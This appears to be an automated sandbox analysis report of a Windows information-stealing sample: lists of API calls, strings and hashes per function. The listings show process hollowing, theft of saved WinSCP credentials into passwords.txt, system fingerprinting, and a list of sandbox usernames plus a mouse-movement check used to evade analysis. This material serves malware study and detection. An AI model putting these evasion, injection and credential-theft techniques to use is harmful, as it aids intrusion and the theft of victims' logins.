                                                            • Instruction ID: cfd5adc8c7fec37571e4615a2d659ce623d81488d817e1095ce6785adf6647ed
                                                            • Opcode Fuzzy Hash: 7ac010871cfdc6928f55026d9108d12a4a42d5102455bbea89dd41d9649856e6
                                                            • Instruction Fuzzy Hash: 1A11B971A0011CABCB10EB65DC45FCD7378AB14704F0000A6B645E7191DAB89FC88F58
                                                            APIs
                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
                                                            • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: OpenQueryValue
                                                            • String ID: Windows 11
                                                            • API String ID: 4153817207-2517555085
                                                            • Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                            • Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
                                                            • Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                            • Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714
                                                            APIs
                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
                                                            • RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: OpenQueryValue
                                                            • String ID: CurrentBuildNumber
                                                            • API String ID: 4153817207-1022791448
                                                            • Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                            • Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
                                                            • Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                            • Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                            • GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocComputerNameProcess
                                                            • String ID:
                                                            • API String ID: 4203777966-0
                                                            • Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                            • Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
                                                            • Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                            • Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prolog3_catch
                                                            • String ID: ERROR
                                                            • API String ID: 3886170330-2861137601
                                                            • Opcode ID: 338cbee65a1c59e49c180845701e6b8bd9124d1ad38e350ac5568e3f1653b496
                                                            • Instruction ID: 206493d018c0af61ad3247b9a1edf73ec3ff293b71de332acb6c3f6d1aa8c941
                                                            • Opcode Fuzzy Hash: 338cbee65a1c59e49c180845701e6b8bd9124d1ad38e350ac5568e3f1653b496
                                                            • Instruction Fuzzy Hash: 5711B131900209AFCB40FF75D9026DCBBB1BF04308B80413AE814E3191D739EAA98FC9
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID: %d MB
                                                            • API String ID: 1890195054-2651807785
                                                            • Opcode ID: 17f18dc7cf53f9ebfacd37114c0aa46941e1124f845af7428171d2bc88ac11d2
                                                            • Instruction ID: d79e8d54b07d2f615201cd360c868d95b9dac01f4be2040cf9acff1c057e51b0
                                                            • Opcode Fuzzy Hash: 17f18dc7cf53f9ebfacd37114c0aa46941e1124f845af7428171d2bc88ac11d2
                                                            • Instruction Fuzzy Hash: F201A9B1E00218BBEB08DFB4DC45EEFB7B9EF08705F04006AF602D7290EA7599818758
                                                            APIs
                                                            • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileModuleName
                                                            • String ID: =A
                                                            • API String ID: 514040917-2399317284
                                                            • Opcode ID: 72c40201efdd98e4edf8bbd3583afce16a5aafa9b07f53dd0fe7720fa140496e
                                                            • Instruction ID: ac01e61fcc3a8dc6a5e43971812eb7396920612e483317b6d6b91c956b259603
                                                            • Opcode Fuzzy Hash: 72c40201efdd98e4edf8bbd3583afce16a5aafa9b07f53dd0fe7720fa140496e
                                                            • Instruction Fuzzy Hash: 84F0B471600218ABDB24EB68DC45FEF77BC9B44B08F10006AF645D7180EEB5DAC58B54
                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateObjectSingleThreadWait
                                                            • String ID:
                                                            • API String ID: 1891408510-0
                                                            • Opcode ID: 1c6142cbbd9849c9f35e06356520fbbbc19007ee5fb9fef6d8df9f607a11363d
                                                            • Instruction ID: 6ddc57dea45eff21f3b413cd8a29bb57df9be50e409c6c2ee2748a51ac3a6ecc
                                                            • Opcode Fuzzy Hash: 1c6142cbbd9849c9f35e06356520fbbbc19007ee5fb9fef6d8df9f607a11363d
                                                            • Instruction Fuzzy Hash: E6217832900229ABCF10EF96EC419DE7BB9FF44358F10402BF904A3150D738AA86CFA4
                                                            APIs
                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                            • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: OpenQueryValue
                                                            • String ID:
                                                            • API String ID: 4153817207-0
                                                            • Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                            • Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
                                                            • Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                            • Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60
                                                            APIs
                                                            • malloc.MSVCRT ref: 0041CCDC
                                                              • Part of subcall function 0041BC7F: lstrlenA.KERNEL32(?,0041CCED,0041CD8F,00000000,06400000,00000003,00000000,0041768F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BCB1
                                                              • Part of subcall function 0041BC7F: malloc.MSVCRT ref: 0041BCB9
                                                              • Part of subcall function 0041BC7F: lstrcpyA.KERNEL32(00000000,?), ref: 0041BCC4
                                                            • malloc.MSVCRT ref: 0041CD19
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: malloc$lstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 2974738957-0
                                                            • Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                            • Instruction ID: fcaced55c1c361c3e27715ea7ae3a17afdad1615e326a9d39dd71d0aa4f9bcfc
                                                            • Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                            • Instruction Fuzzy Hash: 6BF0F0721412166BDB206F6AEC8098BBB94EB457A0F150037FD0997351EA38CC4086F9
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(?,004185D2), ref: 0041898D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 98b88b5f96dc66c065c06141136ba5df242bfcb15761572c331c610d89b40f79
                                                            • Instruction ID: 199c42d56f0628ccab12840d69b6f02f13cfb0cf7a8249375453f6caf445ef8e
                                                            • Opcode Fuzzy Hash: 98b88b5f96dc66c065c06141136ba5df242bfcb15761572c331c610d89b40f79
                                                            • Instruction Fuzzy Hash: 2B7106B5910312AFEF1ADF60FD488243BA7F70874BF11A426E91582270EB374A64EF55
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00410CDF
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 5c7da9d774efdaa0fdd76bf82abc7e5b87a86e22502ea334df05fc1f96782480
                                                            • Instruction ID: 829b10f54598a7ff4258e043d4963b9d7c9dabd005c17a1734c4fecc941c9070
                                                            • Opcode Fuzzy Hash: 5c7da9d774efdaa0fdd76bf82abc7e5b87a86e22502ea334df05fc1f96782480
                                                            • Instruction Fuzzy Hash: 22F031B2900218BBDF14DFE59C059BF77BCAB0C716F001095F941E2180E6399A80D775
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: malloc
                                                            • String ID:
                                                            • API String ID: 2803490479-0
                                                            • Opcode ID: f9060b93a179226b6bcb6403471e41fabc2e13e5dadf3889cf2d7472838e218b
                                                            • Instruction ID: b821a3ed68e39ced0a1ee7d52ccadc00ba9e28cef2c83c113185a37151cab313
                                                            • Opcode Fuzzy Hash: f9060b93a179226b6bcb6403471e41fabc2e13e5dadf3889cf2d7472838e218b
                                                            • Instruction Fuzzy Hash: A221F6742007108FC320DF6ED495996B7F1FF49314B14486EEA8A8B722D776E880CB15
                                                            APIs
                                                            • _memset.LIBCMT ref: 0040F57C
                                                            • GetThreadContext.KERNEL32(?,00000000), ref: 0040F5C4
                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F5E2
                                                            • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040F5F8
                                                            • WriteProcessMemory.KERNEL32(?,00000000,a-A,?,00000000), ref: 0040F627
                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040F65D
                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F684
                                                            • SetThreadContext.KERNEL32(?,00000000), ref: 0040F696
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MemoryProcess$Write$ContextThread$AllocReadVirtual_memset
                                                            • String ID: C:\Windows\System32\cmd.exe$a-A
                                                            • API String ID: 1852632844-431432405
                                                            • Opcode ID: c39c767b4fc440431594be31adcdd6aa0aa839711508083770b6d10c9d5435bd
                                                            • Instruction ID: 1dbec0a9bd52493e5c3d537ba7c19bf6326571b571cf52f9f0c3be7ee7289f1e
                                                            • Opcode Fuzzy Hash: c39c767b4fc440431594be31adcdd6aa0aa839711508083770b6d10c9d5435bd
                                                            • Instruction Fuzzy Hash: EF413872A00208AFEB11DFA4DC85FAAB7B9FF48705F144475FA01E6161E776AD448B24
                                                            APIs
                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
                                                            • _memset.LIBCMT ref: 004151E5
                                                            • GetDriveTypeA.KERNEL32(?), ref: 004151EE
                                                              • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
                                                              • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
                                                              • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _memset$Drive$LogicalStringsType
                                                            • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                            • API String ID: 2132072831-147700698
                                                            • Opcode ID: 25dee723edb154986e326efe7e223fa8c1d01518070de25a6a7738e7c8dc9afa
                                                            • Instruction ID: ea4f15970c6a5d4b45be7a2176528fb80d3ae30a0f48c86a9c416c7322ab13a3
                                                            • Opcode Fuzzy Hash: 25dee723edb154986e326efe7e223fa8c1d01518070de25a6a7738e7c8dc9afa
                                                            • Instruction Fuzzy Hash: 3C512CB190021CAFDF219FA1CC85BDA7BB9FB05304F1041AAEA49A7111EB355E89CF59
                                                            APIs
                                                            • OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00401823
                                                            • SetThreadDesktop.USER32(00000000), ref: 0040182A
                                                            • GetCursorPos.USER32(?), ref: 0040183A
                                                            • Sleep.KERNEL32(000003E8), ref: 0040184A
                                                            • GetCursorPos.USER32(?), ref: 00401859
                                                            • Sleep.KERNEL32(00002710), ref: 0040186B
                                                            • Sleep.KERNEL32(000003E8), ref: 00401870
                                                            • GetCursorPos.USER32(?), ref: 0040187F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CursorSleep$Desktop$InputOpenThread
                                                            • String ID:
                                                            • API String ID: 3283940658-0
                                                            • Opcode ID: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
                                                            • Instruction ID: 6ce610161f310883e20b46de56f80fe1d7998de54b5bc585690095a2dc5f2f67
                                                            • Opcode Fuzzy Hash: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
                                                            • Instruction Fuzzy Hash: C9112E32E00209EBEB10EBA4CD89AAF77B9AF44301F644877D501B21A0D7789B41CB58
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0042B855,?,00428606,?,000000BC,?), ref: 0042B22B
                                                            • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0042B855,?,00428606,?,000000BC,?), ref: 0042B254
                                                            • GetACP.KERNEL32(?,?,0042B855,?,00428606,?,000000BC,?), ref: 0042B268
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID: ACP$OCP
                                                            • API String ID: 2299586839-711371036
                                                            • Opcode ID: dabdef429acf28403b0f87105750c87aa7dd444468e3f7da184b66417ca4622f
                                                            • Instruction ID: 1d8a24c55ad27a2629b7a766668cf871eddc3622aa3f9d7e0ae662acd3c2ea88
                                                            • Opcode Fuzzy Hash: dabdef429acf28403b0f87105750c87aa7dd444468e3f7da184b66417ca4622f
                                                            • Instruction Fuzzy Hash: F101D831701716FAEB219B51FC4AF5F73A8DB45368F60009AF001E0581D778DA4192AD
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32 ref: 0041D562
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D577
                                                            • UnhandledExceptionFilter.KERNEL32(0043332C), ref: 0041D582
                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0041D59E
                                                            • TerminateProcess.KERNEL32(00000000), ref: 0041D5A5
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                            • String ID:
                                                            • API String ID: 2579439406-0
                                                            • Opcode ID: 81b757bedadb6aa414f3cbb5558a59dfea264c2a9b68c96a8667cab582a7df29
                                                            • Instruction ID: 4bba9ff048c9058af47a45dce311be71d9a10e9393078c90d81800ef8cb4dbee
                                                            • Opcode Fuzzy Hash: 81b757bedadb6aa414f3cbb5558a59dfea264c2a9b68c96a8667cab582a7df29
                                                            • Instruction Fuzzy Hash: B621CDB4C01701DFD724DFA4F949A443BB4BF08316F10916AF41887262E7B4D9818F5E
                                                            APIs
                                                            • _memset.LIBCMT ref: 0040E1B7
                                                            • _memset.LIBCMT ref: 0040E1D7
                                                            • _memset.LIBCMT ref: 0040E1E8
                                                            • _memset.LIBCMT ref: 0040E1F9
                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
                                                            • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
                                                            • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
                                                            • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _memset$Value$Open
                                                            • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                            • API String ID: 2191171593-2798830873
                                                            • Opcode ID: 4eaab8354fff006c774e5a3a11a8fc4062ced311967a4d7608afb3132e7bbd75
                                                            • Instruction ID: ab712d79911a6534e16ca2c8d51643d97c9570b95301d2e418567ee179d90524
                                                            • Opcode Fuzzy Hash: 4eaab8354fff006c774e5a3a11a8fc4062ced311967a4d7608afb3132e7bbd75
                                                            • Instruction Fuzzy Hash: 56D1D6B195012DAADF21EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5
                                                            APIs
                                                              • Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,75AA5460,?,00000000), ref: 0040DBBB
                                                              • Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBCD
                                                            • HeapFree.KERNEL32(00000000), ref: 0040DD27
                                                            • strcpy_s.MSVCRT ref: 0040DD43
                                                            • HeapFree.KERNEL32(00000000), ref: 0040DD62
                                                            • HeapFree.KERNEL32(00000000), ref: 0040DD9A
                                                            • HeapFree.KERNEL32(00000000), ref: 0040DDC4
                                                            • strcpy_s.MSVCRT ref: 0040DDDA
                                                            • HeapFree.KERNEL32(00000000), ref: 0040DDF3
                                                            • HeapFree.KERNEL32(00000000), ref: 0040DE18
                                                            • HeapFree.KERNEL32(00000000), ref: 0040DE42
                                                            • strcpy_s.MSVCRT ref: 0040DE52
                                                            • HeapFree.KERNEL32(00000000), ref: 0040DE6B
                                                            • HeapFree.KERNEL32(00000000), ref: 0040DE9A
                                                            • HeapFree.KERNEL32(00000000), ref: 0040DECA
                                                            • strcpy_s.MSVCRT ref: 0040DEDD
                                                            • HeapFree.KERNEL32(00000000), ref: 0040DEF6
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040DEFF
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040DF34
                                                              • Part of subcall function 0040F128: std::_Xinvalid_argument.LIBCPMT ref: 0040F13E
                                                            • strcpy_s.MSVCRT ref: 0040DF75
                                                            • HeapFree.KERNEL32(00000000), ref: 0040DFA8
                                                            • lstrlenA.KERNEL32(?), ref: 0040DFAD
                                                            • HeapFree.KERNEL32(00000000), ref: 0040DFDE
                                                            • strcpy_s.MSVCRT ref: 0040DFEC
                                                            • HeapFree.KERNEL32(00000000), ref: 0040E000
                                                            • HeapFree.KERNEL32(00000000), ref: 0040E03C
                                                            • strcpy_s.MSVCRT ref: 0040E065
                                                            • HeapFree.KERNEL32(00000000), ref: 0040E07E
                                                            • HeapFree.KERNEL32(00000000), ref: 0040E129
                                                            • HeapFree.KERNEL32(00000000), ref: 0040E17A
                                                              • Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBF2
                                                              • Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
                                                              • Part of subcall function 0040DB7F: strcpy_s.MSVCRT ref: 0040DC6F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap$strcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
                                                            • String ID:
                                                            • API String ID: 219400098-0
                                                            • Opcode ID: 944c7dbbb483e652ea0c5082bda78fe99dba96f91c80018fac581aa229666c1c
                                                            • Instruction ID: 55d57addeb693bec13dd2aca0e3f8bc9cd2252af75e58958267656c534a8cbc3
                                                            • Opcode Fuzzy Hash: 944c7dbbb483e652ea0c5082bda78fe99dba96f91c80018fac581aa229666c1c
                                                            • Instruction Fuzzy Hash: 36E14C72C00219ABEF249FF1DC48ADEBF79BF08305F1454AAF115B3152EA3A59849F54
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00424C3F
                                                            • __mtterm.LIBCMT ref: 00424C4B
                                                              • Part of subcall function 0042490A: DecodePointer.KERNEL32(FFFFFFFF), ref: 0042491B
                                                              • Part of subcall function 0042490A: TlsFree.KERNEL32(FFFFFFFF), ref: 00424935
                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00424C61
                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00424C6E
                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00424C7B
                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00424C88
                                                            • TlsAlloc.KERNEL32 ref: 00424CD8
                                                            • TlsSetValue.KERNEL32(00000000), ref: 00424CF3
                                                            • __init_pointers.LIBCMT ref: 00424CFD
                                                            • EncodePointer.KERNEL32 ref: 00424D0E
                                                            • EncodePointer.KERNEL32 ref: 00424D1B
                                                            • EncodePointer.KERNEL32 ref: 00424D28
                                                            • EncodePointer.KERNEL32 ref: 00424D35
                                                            • DecodePointer.KERNEL32(Function_00024A8E), ref: 00424D56
                                                            • __calloc_crt.LIBCMT ref: 00424D6B
                                                            • DecodePointer.KERNEL32(00000000), ref: 00424D85
                                                            • __initptd.LIBCMT ref: 00424D90
                                                            • GetCurrentThreadId.KERNEL32 ref: 00424D97
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                            • API String ID: 3732613303-3819984048
                                                            • Opcode ID: c4b24359c7556117875d4a9d0ed065821010c0f35d81486e563c5d9150432d9a
                                                            • Instruction ID: 94530a44bd353d5e48263630fbc58cc49e13d953e031ca61b59d9614a8241a7b
                                                            • Opcode Fuzzy Hash: c4b24359c7556117875d4a9d0ed065821010c0f35d81486e563c5d9150432d9a
                                                            • Instruction Fuzzy Hash: CC316B31E013649ACB22AF7ABC0860A3BA4EF84762B51063BE410D32B1DFB8C440DF4D
                                                            APIs
                                                            • GetUserNameA.ADVAPI32(?,?), ref: 00401A13
                                                            • lstrcmpiA.KERNEL32(0043AC84,?), ref: 00401A2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: NameUserlstrcmpi
                                                            • String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
                                                            • API String ID: 542268695-1784693376
                                                            • Opcode ID: da99fce13d188c8d449195af6028c632b9155eeec286f17b5d3ae48a6bd12366
                                                            • Instruction ID: d1bae68e67e499abaef637c9412b49fd07aa939d7eda53f7808c85b94d013073
                                                            • Opcode Fuzzy Hash: da99fce13d188c8d449195af6028c632b9155eeec286f17b5d3ae48a6bd12366
